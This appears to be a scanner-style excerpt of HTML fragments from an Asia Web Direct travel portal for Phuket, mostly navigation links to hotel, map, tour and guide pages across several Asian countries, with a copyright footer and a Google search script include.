<li><a class="level3" href="http://www.phuket.com/sports/fitness.htm" >Fitness Centres in Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/health.htm" >Health Articles</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/health/phuket-hospitals.htm" >Hospitals</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/spa_massage/" >Phuket Spas</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/health/plastic-surgery.htm" >Plastic Surgery</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/health/health-info.htm" >Prepare for your Trip</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/health/phuket-skincare.htm" >Skincare</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/history.htm" >History</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/info/phuket-airport.htm" >Phuket Airport</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/populat.htm" >Population</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/info/travel_there.htm" >Pre Travel Information</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/info/phuket-airport.htm" >Airport & Transfers</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/carrent/" >Phuket Car Rental</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/info/travel_around.htm" >Travel Around Phuket</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/info/travel_there.htm" >Visas</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/island/weather.htm" >Weather in Phuket</a>
...[SNIP]...
<li><a class="level2-arrow" href="http://www.phuket.com/property/" ><strong>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/property/index_house_rent.htm" >Houses for Rent</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/magazine/property.htm" >Phuket Property Articles</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/real-estate/" >Property Features</a>
...[SNIP]...
<li><a class="level3" href="http://www.phuket.com/property/property.htm" >Villa Rentals</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/schools.htm" >Schools</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/weather.htm" ><strong>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket-maps.com/" >Phuket Interactive Maps</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/bangtao.htm" >Bangtao Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/panwa.htm" >Cape Panwa Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/chalong.htm" >Chalong Bay Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/kamala.htm" >Kamala Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/karon.htm" >Karon Beach map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/kata.htm" >Kata Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/maikhao-beach.htm" >Mai Khao Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/naiyang.htm" >Nai Yang Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/phuket_town.htm" >Phuket Town Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/rawai-beach.htm" >Rawai Beach Map</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket-maps.com/surin-beach.htm" >Surin Beach Map</a>
...[SNIP]...
<li>
   <a class="menutitle-arrow" href="http://www.phuket.com/beyond/" >Around Phuket</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/beyond/khaolak.htm" >Khao Lak</a>
...[SNIP]...
<li><a class="level2" href="http://www.kohlanta-thailand.com/" >Koh Lanta</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/beyond/krabi.htm" >Krabi</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/island/phangnga.htm" >Phang Nga</a>
...[SNIP]...
<li><a class="level2" href="http://www.phiphi.phuket.com/" >Phi Phi Islands</a>
...[SNIP]...
<li><a class="level2" href="http://www.phuket.com/beyond/trang.htm" >Trang</a>
...[SNIP]...
<li>
   <a class="item" href="http://www.asiawebdirect.com/employment.htm" >Employments and Jobs</a>
...[SNIP]...
<br />
   <a target="_blank" href="http://www.twitter.com/asiawebdirect/">
       <img vspace="0" border="0" src="http://static.asiawebdirect.com/portals/images/tweet1.png" />
   </a>
   <br/>
   <a target="_blank" href="http://www.facebook.com/asiawebdirect/">
       <img vspace="0" border="0" src="http://static.asiawebdirect.com/portals/images/facebook-1.png" />
   </a>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
<td><a class="first" href="http://www.phuket.com/" target="_blank">Phuket</a>
...[SNIP]...
<td><a class="" href="http://www.phuket.com/hotels/" target="_blank">Hotels</a>
...[SNIP]...
<td><a class="" href="http://www.phuket-maps.com/" target="_blank">Maps</a>
...[SNIP]...
<td><a class="" href="http://www.phuket-photos.com/" target="_blank">Photos</a>
...[SNIP]...
<td><a class="" href="http://www.forum.asiawebdirect.com/" target="_blank">Forum</a>
...[SNIP]...
<div id="footer">
<a href="http://www.asiawebdirect.com/" target="_blank">
<img id="footer-logo" src="http://static.asiawebdirect.com/portals/images/logo.png" />
</a>
...[SNIP]...
<div id="footer-contents">

<a class="webdesign" href="http://www.andagraf.com">Web Design</a> Copyright &copy; 2011 by <a target="_blank" href="http://www.asiawebdirect.com/aboutus/">Asia Web Direct</a>
...[SNIP]...
<br/>
E-mail: <a onclick="this.href=this.href+'?page='+document.URL" target="_blank" href="http://www.asiawebdirect.com/customer/enquiry/">Contact Us</a><br/><br/>
Please read our <a target="_blank" href="http://www.asiawebdirect.com/privacy/">Privacy Policy</a> and <a target="_blank" href="http://www.asiawebdirect.com/copyright.htm">Copyright Notice</a>
...[SNIP]...
<!--end footer-wrapper-->
<img class="bottom-right-corner" src="http://static.asiawebdirect.com/portals/images/cnr-bottom-right.gif"/>
</div>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en&sitesearch=true"></script>
...[SNIP]...
<li class="base"><a class="down" href="http://www.asiawebdirect.com">Asia</a>
...[SNIP]...
<li><a class="daddy" href="http://www.thaiwave.com/">Thailand</a>
...[SNIP]...
<li><a class="daddy" href="http://www.bangkok.com/">Bangkok</a>
...[SNIP]...
<li><a href="http://www.bangkok.com/hotels/">Bangkok Hotels</a>
...[SNIP]...
<li><a href="http://www.bangkok.com/tours/">Bangkok Tours</a>
...[SNIP]...
<li><a href="http://www.bangkok.com/">Bangkok Guide</a>
...[SNIP]...
<li><a href="http://www.bangkok-maps.com/">Bangkok Maps</a>
...[SNIP]...
<li><a href="http://www.bangkok-photos.com/">Bangkok Photos</a>
...[SNIP]...
<li><a href="http://www.goto.bangkok.com/">............ .........</a>
...[SNIP]...
<li><a class="daddy" href="http://www.phuket.com">Phuket</a>
...[SNIP]...
<li><a class="daddy" href="http://www.phuket.com/hotels/">Phuket Hotels</a>
...[SNIP]...
<li><a href="http://www.phuket.com/">Phuket Guide</a>
...[SNIP]...
<li><a href="http://www.phuket-maps.com/">Phuket Maps</a>
...[SNIP]...
<li><a href="http://www.phuket-photos.com/">Phuket Photos</a>
...[SNIP]...
<li><a href="http://www.tropicalphuket.com/">...............</a>
...[SNIP]...
<li><a class="daddy" href="http://www.kosamui.com">Koh Samui</a>
...[SNIP]...
<li><a href="http://www.samui-hotels.com/">Koh Samui Hotels</a>
...[SNIP]...
<li><a href="http://www.kosamui.com/tours/">Koh Samui Tours</a>
...[SNIP]...
<li><a href="http://www.kosamui.com/">Koh Samui Guide</a>
...[SNIP]...
<li><a href="http://www.samui-maps.com/">Koh Samui Maps</a>
...[SNIP]...
<li><a href="http://www.samui-photos.com/">Koh Samui Photos</a>
...[SNIP]...
<li><a href="http://www.koh.samui-hotels.com/">......... .........</a>
...[SNIP]...
<li><a class="daddy" href="http://www.krabi-hotels.com/">Krabi</a>
...[SNIP]...
<li><a href="http://www.krabi-hotels.com/hotels/">Krabi Hotels</a>
...[SNIP]...
<li><a href="http://www.krabi-travel.com/">Krabi Tours</a>
...[SNIP]...
<li><a href="http://www.krabi-hotels.com/">Krabi Guide</a>
...[SNIP]...
<li><a href="http://www.krabi-maps.com/">Krabi Maps</a>
...[SNIP]...
<li><a href="http://www.krabi-photos.com/">Krabi Photos</a>
...[SNIP]...
<li><a class="daddy" href="http://www.khaolak-hotels.com/">Khao Lak</a>
...[SNIP]...
<li><a href="http://www.khaolak-hotels.com/hotels/">Khao Lak Resorts</a>
...[SNIP]...
<li><a href="http://www.khaolak-hotels.com/tours/">Khao Lak Tours</a>
...[SNIP]...
<li><a href="http://www.khaolak-hotels.com/">Khao Lak Guide</a>
...[SNIP]...
<li><a href="http://www.khaolak-maps.com/">Khao Lak Maps</a>
...[SNIP]...
<li><a href="http://www.khaolak-hotels.com/photos/">Khao Lak Photos</a>
...[SNIP]...
<li><a class="daddy" href="http://www.pattaya.bangkok.com/">Pattaya</a>
...[SNIP]...
<li><a href="http://www.pattaya.bangkok.com/hotels/">Pattaya Hotels</a>
...[SNIP]...
<li><a href="http://www.pattaya.bangkok.com/tours/">Pattaya Tours</a>
...[SNIP]...
<li><a href="http://www.pattaya.bangkok.com/">Pattaya Guide</a>
...[SNIP]...
<li><a href="http://www.pattaya-maps.com/">Pattaya Maps</a>
...[SNIP]...
<li><a href="http://www.pattaya.bangkok.com/photos/">Pattaya Photos</a>
...[SNIP]...
<li><a href="http://www.huahin.bangkok.com/">Hua Hin</a>
...[SNIP]...
<li><a href="http://www.huahin.bangkok.com/hotels/">Hua Hin Hotels</a>
...[SNIP]...
<li><a href="http://www.huahin.bangkok.com/tours/">Hua Hin Tours</a>
...[SNIP]...
<li><a href="http://www.huahin.bangkok.com/">Hua Hin Guide</a>
...[SNIP]...
<li><a href="http://www.huahin.bangkok.com/maps/">Hua Hin Maps</a>
...[SNIP]...
<li><a href="http://www.huahin.bangkok.com/photos/">Hua Hin Photos</a>
...[SNIP]...
<li><a class="daddy" href="http://www.koh-chang.bangkok.com/">Koh Chang</a>
...[SNIP]...
<li><a href="http://www.koh-chang.bangkok.com/hotels/">Koh Chang Hotels</a>
...[SNIP]...
<li><a href="http://www.koh-chang.bangkok.com/">Koh Chang Guide</a>
...[SNIP]...
<li><a href="http://www.koh-chang.bangkok.com/maps/">Koh Chang Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.chiangmai.bangkok.com/">Chiang Mai</a>
...[SNIP]...
<li><a href="http://www.chiangmai.bangkok.com/hotels/">Chiang Mai Hotels</a>
...[SNIP]...
<li><a href="http://www.chiangmai.bangkok.com/tours/">Chiang Mai Tours</a>
...[SNIP]...
<li><a href="http://www.chiangmai.bangkok.com/">Chiang Mai Guide</a>
...[SNIP]...
<li><a href="http://www.chiangmai-maps.com/">Chiang Mai Maps</a>
...[SNIP]...
<li><a href="http://www.chiangmai.bangkok.com/photos/">Chiang Mai Photos</a>
...[SNIP]...
<li><a href="http://www.goto-chiangmai.com/">............... .........</a>
...[SNIP]...
<li><a href="http://www.phiphi.phuket.com/">Phi Phi Island</a>
...[SNIP]...
<li><a href="http://www.phiphi.phuket.com/hotels/">Phi Phi Island Hotels</a>
...[SNIP]...
<li><a href="http://www.phiphi.phuket.com/">Phi Phi Island Guide</a>
...[SNIP]...
<li><a href="http://www.krabi-maps.com/phiphi.htm">Phi Phi Island Maps</a>
...[SNIP]...
<li><a class="more" href="http://www.thaiwave.com/">More...</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-malaysia.com/">Malaysia</a>
...[SNIP]...
<li><a class="daddy" href="http://www.kuala-lumpur.ws/">Kuala Lumpur</a>
...[SNIP]...
<li><a href="http://www.kl-hotels.com/">Kuala Lumpur Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-malaysia.com/kl-tours/">Kuala Lumpur Tours</a>
...[SNIP]...
<li><a href="http://www.kuala-lumpur.ws/">Kuala Lumpur Guide</a>
...[SNIP]...
<li><a href="http://www.malaysia-maps.com/kuala-lumpur-map.htm">Kuala Lumpur Maps</a>
...[SNIP]...
<li><a href="http://www.kl-photos.com/">Kuala Lumpur Photos</a>
...[SNIP]...
<li><a href="http://www.goto-asia.net/kl-hotel.htm">........................ .........</a>
...[SNIP]...
<li><a class="daddy" href="http://www.langkawi-info.com/">Langkawi</a>
...[SNIP]...
<li><a href="http://www.langkawi-resorts.com/">Langkawi Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-malaysia.com/langkawi-tours/">Langkawi Tours</a>
...[SNIP]...
<li><a href="http://www.langkawi-info.com/">Langkawi Guide</a>
...[SNIP]...
<li><a href="http://www.malaysia-maps.com/langkawi-map.htm">Langkawi Maps</a>
...[SNIP]...
<li><a href="http://www.goto-asia.net/langkawi-hotel.htm">............... .........</a>
...[SNIP]...
<li><a class="daddy" href="http://www.penang.ws/">Penang</a>
...[SNIP]...
<li><a href="http://www.penang-hotels.com/">Penang Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-malaysia.com/penang-tours/">Penang Tours</a>
...[SNIP]...
<li><a href="http://www.penang.ws/">Penang Guide</a>
...[SNIP]...
<li><a href="http://www.malaysia-maps.com/penang-map.htm">Penang Maps</a>
...[SNIP]...
<li><a href="http://www.penang.ws/photos/">Penang Photos</a>
...[SNIP]...
<li><a href="http://www.goto-asia.net/penang-hotel.htm">......... .........</a>
...[SNIP]...
<li><a href="http://www.malacca.ws/">Malacca</a>
...[SNIP]...
<li><a href="http://www.malacca-hotels.com/">Malacca Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-malaysia.com/malacca-tours/">Malacca Tours</a>
...[SNIP]...
<li><a href="http://www.malacca.ws/">Malacca Guide</a>
...[SNIP]...
<li><a href="http://www.malaysia-maps.com/penang-map.htm">Malacca Maps</a>
...[SNIP]...
<li><a href="http://www.penang.ws/photos/">Malacca Photos</a>
...[SNIP]...
<li><a class="daddy" href="http://www.borneo-hotels.com/sarawak/">Sarawak</a>
...[SNIP]...
<li><a href="http://www.sarawak-hotels.com/">Sarawak Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-malaysia.com/sarawak-tours/">Sarawak Tours</a>
...[SNIP]...
<li><a href="http://www.borneo-hotels.com/sarawak/">Sarawak Guide</a>
...[SNIP]...
<li><a href="http://www.malaysia-maps.com/sarawak-map.htm">Sarawak Maps</a>
...[SNIP]...
<li><a href="http://www.goto-asia.net/sabah-hotels.htm">...... .........</a>
...[SNIP]...
<li><a class="more" href="http://www.visit-malaysia.com/">More...</a>
...[SNIP]...
<li><a class="daddy" href="http://www-singapore.com/">Singapore</a>
...[SNIP]...
<li><a href="http://www-singapore.com/accommodation/">Singapore Hotels</a>
...[SNIP]...
<li><a href="http://www-singapore.com/tours/">Singapore Tours</a>
...[SNIP]...
<li><a href="http://www-singapore.com/">Singapore Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/singapore/">Singapore Maps</a>
...[SNIP]...
<li><a href="http://www.singapore-photos.com/">Singapore Photos</a>
...[SNIP]...
<li><a href="http://www.goto-singapore.com/">.................. .........</a>
...[SNIP]...
<li><a class="daddy" href="http://www.china-hotels.ws/">China</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/beijing/">Beijing</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/hotels/beijing/">Beijing Hotels</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/beijing/">Beijing Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/china/beijing-map.htm">Beijing Maps</a>
...[SNIP]...
<li><a href="http://www.phuket-photos.com/beijing.htm">Beijing Photos</a>
...[SNIP]...
<li><a class="daddy" href="http://www.china-hotels.ws/shanghai/">Shanghai</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/hotels/shanghai.htm">Shanghai Hotels</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/shanghai/">Shanghai Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/china/shanghai-map.htm">Shanghai Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.china-macau.com/">Macau</a>
...[SNIP]...
<li><a href="http://www.hong-kong-hotels.ws/hotels/macau/macau/">Macau Hotels</a>
...[SNIP]...
<li><a href="http://www.hong-kong-hotels.ws/tours-macau-china/macau-tour.htm">Macau Tours</a>
...[SNIP]...
<li><a href="http://www.china-macau.com/">Macau Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/macau/">Macau Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.china-hotels.ws/guangzhou/">Guangzhou</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/hotels/guangzhou.htm">Guangzhou Hotels</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/guangzhou/">Guangzhou Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/china/guangzhou-map.htm">Guangzhou Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.china-hotels.ws/xian/">Xi'an</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/hotels/xian.htm">Xi'an Hotels</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/xian/">Xi'an Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/china/xian-map.htm">Xi'an Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.china-hotels.ws/chengdu/">Chengdu</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/hotels/chengdu.htm">Chengdu Hotels</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/chengdu/">Chengdu Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/china/chengdu-map.htm">Chengdu Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.china-hotels.ws/lijiang/">Lijiang</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/hotels/lijiang.htm">Lijiang Hotels</a>
...[SNIP]...
<li><a href="http://www.china-hotels.ws/lijiang/">Lijiang Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/china/lijiang-map.htm">Lijiang Map</a>
...[SNIP]...
<li><a class="more" href="http://www.china-hotels.ws/">More...</a>
...[SNIP]...
<li><a class="daddy" href="http://www.hong-kong-hotels.ws/">- Hong Kong</a>
...[SNIP]...
<li><a href="http://www.hong-kong-hotels.ws/hotels/">Hong Kong Hotels</a>
...[SNIP]...
<li><a href="http://www.hong-kong-hotels.ws/tours/">Hong Kong Tours</a>
...[SNIP]...
<li><a href="http://www.hong-kong-hotels.ws/">Hong Kong Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/hong-kong/">Hong Kong Maps</a>
...[SNIP]...
<li><a href="http://www.hong-kong-hotels.ws/photos/hk-photo.html">Hong Kong Photos</a>
...[SNIP]...
<li><a href="http://www.goto-hongkong.com/">...... .........</a>
...[SNIP]...
<li><a class="daddy" href="http://www.indonesia-holidays.com/">Indonesia</a>
...[SNIP]...
<li><a href="http://www.indonesia-holidays.com/jakarta/">Jakarta</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/indonesia/jakarta/">Jakarta Hotels</a>
...[SNIP]...
<li><a href="http://www.indonesia-holidays.com/jakarta/">Jakarta Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/indonesia/jakarta-map.htm">Jakarta Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.indonesia-holidays.com/lombok-island/index.htm">Lombok Island</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/indonesia/lombok/">Lombok Hotels</a>
...[SNIP]...
<li><a href="http://www.indonesia-holidays.com/lombok-island/">Lombok Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/indonesia/lombok-map.htm">Lombok Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.indonesia-holidays.com/bintan-island/">Bintan Island</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/singapore/bintan-island/">Bintan Island Hotels</a>
...[SNIP]...
<li><a href="http://www.indonesia-holidays.com/bintan-island/">Bintan Island Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/indonesia/bintan-map.htm">Bintan Island Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.bali-indonesia.com/"> - Bali</a>
...[SNIP]...
<li><a href="http://www.bali-indonesia.com/hotels/">Bali Hotels</a>
...[SNIP]...
<li><a href="http://www.bali-indonesia.com/tours/">Bali Tours</a>
...[SNIP]...
<li><a href="http://www.bali-indonesia.com/">Bali Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/bali/">Bali Maps</a>
...[SNIP]...
<li><a href="http://www.phuket-photos.com/bali.htm">Bali Photos</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/vietnam/">Vietnam</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/vietnam/hanoi/">Hanoi</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/vietnam/hanoi/">Hanoi Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/vietnam/tours/excursions-hanoi.htm">Hanoi Tours</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/vietnam/hanoi/">Hanoi Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/vietnam/hanoi.htm">Hanoi Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/vietnam/ho-chi-minh-city/">Ho Chi Minh City</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/vietnam/ho-chi-minh/">Ho Chi Minh Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/vietnam/tours/excursions-saigon.htm">Ho Chi Minh Tours</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/vietnam/ho-chi-minh-city/">Ho Chi Minh Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/vietnam/ho-chi-minh.htm">Ho Chi Minh Maps</a>
...[SNIP]...
<li><a href="http://www.phuket-photos.com/vietnam-ho-chi-minh.htm">Ho Chi Minh Photos</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/vietnam/da-nang/">Danang</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/vietnam/da-nang/">Danang Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/vietnam/da-nang/">Danang Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/vietnam/da-nang.htm">Danang Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/vietnam/hoi-an/">Hoi An</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/vietnam/hoi-an/">Hoi An Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/vietnam/tours/excursions-hoian.htm">Hoi An Tours</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/vietnam/hoi-an/">Hoi An Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/vietnam/hoi-an.htm">Hoi An Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/vietnam/mui-ne/">Phan Thiet - Mui Ne</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/vietnam/phan-thiet/">Phan Thiet - Mui Ne Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/vietnam/mui-ne/">Phan Thiet - Mui Ne Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/vietnam/phan-thiet.htm">Phan Thiet - Mui Ne Maps</a>
...[SNIP]...
<li><a href="http://www.phuket-photos.com/vietnam-phan-thiep.htm">Phan Thiet - Mui Ne Photos</a>
...[SNIP]...
<li><a class="more" href="http://www.visit-mekong.com/vietnam/">More...</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/cambodia/">Cambodia</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/cambodia/phnom-penh/">Phnom Penh</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/cambodia/phnom-penh/">Phnom Penh Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/cambodia/tours/excursions-phnom-penh.htm">Phnom Penh Tours</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/cambodia/phnom-penh/">Phnom Penh Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/cambodia/phnom-penh.htm">Phnom Penh Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/cambodia/siem-reap/">Siem Reap</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/cambodia/siem-reap/">Siem Reap Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/cambodia/tours/excursions-angkor-siem-reap.htm">Siem Reap Tours</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/cambodia/siem-reap/">Siem Reap Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/cambodia/siem-reap.htm">Siem Reap Maps</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/cambodia/sihanoukville/">Sihanoukville</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/cambodia/sihanoukville/">Sihanoukville Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/cambodia/tours/excursions-sihanoukville.htm">Sihanoukville Tours</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/cambodia/sihanoukville/">Sihanoukville Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/cambodia/sihanoukville.htm">Sihanoukville Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/cambodia/battambang/">Battambang</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/cambodia/battambang/">Battambang Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/cambodia/battambang/">Battambang Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/cambodia/battambang.htm">Battambang Maps</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/laos/">Laos</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/laos/vientiane/">Vientiane</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/laos/vientiane/">Vientiane Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/laos/tours/excursions-vientiane.htm">Vientiane Tours</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/laos/vientiane/">Vientiane Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/laos/vientiane.htm">Vientiane Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/laos/luang-prabang/">Luang Prabang</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/laos/luang-prabang/">Luang Prabang Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/laos/tours/excursions-luangprabang.htm">Luang Prabang Tours</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/laos/luang-prabang/">Luang Prabang Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/laos/luang-prabang.htm">Luang Prabang Maps</a>
...[SNIP]...
<li><a class="daddy" href="http://www.visit-mekong.com/laos/champasak/">Champasak</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/laos/champasak/">Champasak Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/laos/tours/excursions-pakse.htm">Champasak Tours</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/laos/champasak/">Champasak Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/laos/champasak.htm">Champasak Guide</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/laos/savannakhet/">Savannakhet</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/hotels/laos/savannakhet/">Savannakhet Hotels</a>
...[SNIP]...
<li><a href="http://www.visit-mekong.com/laos/savannakhet/">Savannakhet Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/laos/savannakhet.htm">Savannakhet Maps</a>
...[SNIP]...
<li><a class="more" href="http://www.visit-mekong.com/laos/">More...</a>
...[SNIP]...
<li><a class="daddy" href="http://www.japan-hotels.ws/">Japan</a>
...[SNIP]...
<li><a class="daddy" href="http://www.japan-hotels.ws/tokyo/">Tokyo</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/japan/tokyo/hotels/">Tokyo Hotels</a>
...[SNIP]...
<li><a href="http://www.japan-hotels.ws/tokyo/">Tokyo Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/japan/tokyo-map.htm">Tokyo Map</a>
...[SNIP]...
<li><a class="daddy" href="http://www.japan-hotels.ws/kyoto/">Kyoto</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/japan/kyoto/hotels/">Kyoto Hotels</a>
...[SNIP]...
<li><a href="http://www.japan-hotels.ws/kyoto/">Kyoto Guide</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/maps/japan/kyoto-map.htm">Kyoto Map</a>
...[SNIP]...
<li><a class="daddy" href="http://www.japan-hotels.ws/osaka/">Osaka</a>
...[SNIP]...
<li><a href="http://www.asiawebdirect.com/japan/osaka/hotels/">Osaka Hotels</a>
